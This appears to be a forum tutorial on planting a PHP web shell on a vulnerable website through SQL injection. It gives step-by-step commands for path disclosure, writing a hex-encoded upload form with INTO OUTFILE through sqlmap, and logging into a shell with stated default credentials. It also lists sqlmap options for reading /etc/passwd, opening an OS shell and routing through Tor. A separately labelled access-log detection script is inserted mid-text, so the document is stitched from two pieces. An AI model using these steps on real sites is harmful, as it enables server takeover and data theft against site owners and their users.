Upload a shell with SQL injection

What you need:
A PHP shell
An upload script (optional, it might work without one)
sqlmap (optional, but it makes it so much easier)

What is a shell?
Quote:
Shell is a shell wrapped in a script. It's a tool you can use to execute arbitrary shell commands or browse the filesystem on your remote webserver. This replaces, to a degree, a normal telnet connection, and to a lesser degree an SSH connection.

You use it for administration and maintenance of your website, which is often much easier to do if you can work directly on the server. For example, you could use PHP Shell to unpack and move big files around. All the normal command line programs like ps, free, du, df, etc. can be used.

There are some limitations on what kind of programs you can run. It won't do any good if you start a graphical program like Firefox or even a console-based one like vi. All programs have to be strictly command line programs, and they will have no chance of getting user input after they have been launched. They probably also have to terminate within 30 seconds, as this is the default time limit imposed on all PHP scripts, to prevent them from running in an infinite loop. Your ISP may have set this time limit to something else.

But you can rely on all the normal shell functionality, like pipes, output and input redirection, etc.
(source)
So let's start.
1. After finding a vulnerable site you need to get Full Path Disclosure.
I will use the empty array trick: add the brackets [] to the parameter name.
Code:
http://www.example.com/index.php?id[]=1
gives
Code:
Warning:  mysql_fetch_array(): supplied argument is not a valid MySQL result resource i
Now we have the path.
2. Now you need to convert your upload script to hex.
Code:
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uplo
becomes
Code:
3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2
3. Now let's fire up sqlmap with a SQL shell and inject.
Code:
python sqlmap.py --url=http://www.example.com/index.php?id=1 --sql-shell
Let sqlmap do its magic, and after a while you will get a sql-shell prompt:
Quote
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q'
and press ENTER
sql-shell>
Now write:
SELECT 0xYour_Hex_Code INTO OUTFILE "Full_Path/filename";
Don't forget the 0x before your hex, so it should look like this (the hex is shortened here):
Code:
select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374
into outfile "/home/relax/public_html/upload.php";
After a few seconds you should get a confirmation of whether it was successful or not.
4. Browse to http://www.example.com/upload.php and upload the PHP shell.
5. Browse to your PHP shell and log in.
Info:
The username and password for the shell are cyber and gladiator; you can change them in the PHP file. This specific shell must be named cyb3r-sh3ll.php or it will not work.
Think about giving your upload file a unique name so you don't overwrite some existing file; if you change the name you also need to change it in the source.
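Each step of this procedure leaves a recognisable trace in the web server's access log: the `id[]=` probe, a long 0x hex literal, the INTO OUTFILE clause, and (unless --random-agent is used) sqlmap's own User-Agent. The script below is an added detection example, not code from the original post; its log lines, addresses and timestamps are constructed, and the DUMPFILE match generalises the OUTFILE clause above to MySQL's sibling file-write clause.

```python
# Added detection example (not from the original post): flags access-log
# requests that match the probe / hex / INTO OUTFILE / sqlmap patterns.
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined log format; addresses and
# timestamps are made up, the hex is the page's own "<form enctype=..." prefix.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:15:35:06 +0000] "GET /index.php?id[]=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:15:35:09 +0000] "GET /index.php?id=1%20select%200x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d64617461%20into%20outfile%20%22/home/relax/public_html/upload.php%22 HTTP/1.1" 200 77 "-" "sqlmap/1.7 (https://sqlmap.org)"
198.51.100.7 - - [10/Oct/2023:15:36:00 +0000] "GET /index.php?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def analyze_request(path, user_agent):
    """Return the list of indicators found in one request (empty if clean)."""
    decoded = unquote_plus(path)  # normalise %20 / + / %5B%5D before matching
    findings = []
    # Step 1: array-parameter probe (id[]=1) that triggers the warning and path leak.
    if re.search(r'\[\]=', decoded):
        findings.append("array-param FPD probe")
    # Step 3: the file-write clause; DUMPFILE is MySQL's sibling of OUTFILE.
    if re.search(r'\binto\s+(out|dump)file\b', decoded, re.IGNORECASE):
        findings.append("INTO OUTFILE/DUMPFILE file write")
    # Step 2: a long 0x hex literal is how the upload form is smuggled in.
    if re.search(r'0x[0-9a-f]{32,}', decoded, re.IGNORECASE):
        findings.append("long hex literal")
    # sqlmap's default User-Agent names itself unless --random-agent is used.
    if "sqlmap" in user_agent.lower():
        findings.append("sqlmap user-agent")
    return findings

def scan_log(text):
    """Return (client_ip, path, findings) for every suspicious request line."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyze_request(m["path"], m["ua"])
        if findings:
            alerts.append((m["ip"], m["path"], findings))
    return alerts

if __name__ == "__main__":
    for ip, path, findings in scan_log(SAMPLE_LOG):
        print(f"{ip} {path[:50]}... -> {', '.join(findings)}")
```

On the server side the same write is blocked outright when MySQL's secure_file_priv is set and the web application's database account lacks the FILE privilege.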
Extra:
You don't need to use sqlmap; you can simply run the SELECT statement in your browser, though it requires a bit more work.
One theory is that you could inject the full shell code directly instead of first writing the uploader; the problem is that this specific shell is 268 kB, but maybe it would work with a smaller shell.
sqlmap is a really powerful tool, you can do a shitload of stuff with it. Here are some options I find helpful:
-o                       turn on optimization
--threads=1-10           number of threads (faster)
--dbms=mysql             back-end DBMS (faster)
--level=1-5              more tests
--risk=1-3               more tests
--tor-port=xxxx          connect through Tor
--random-agent           random user agent
--file-read=/etc/passwd  read a file from the remote machine
--file-write=/etc/passwd write a file to the remote machine; must be used with --file-dest
--file-dest=/etc/passwd  where to write the --file-write file
--os-shell               like the sql-shell, but a system shell
--wizard                 for beginners
--check-waf              check for WAF/IPS/IDS protection
There are many more, just check them out.
The --file-read/write does not work most of the time, maybe I'm doing something wrong; that's why I use the sql-shell to write files or do specific commands.
--os-shell is awesome, you can't write PHP code to disk with it though.
Well, that was it I think; please share your thoughts, concerns or my mistakes.
Happy hunting 😎
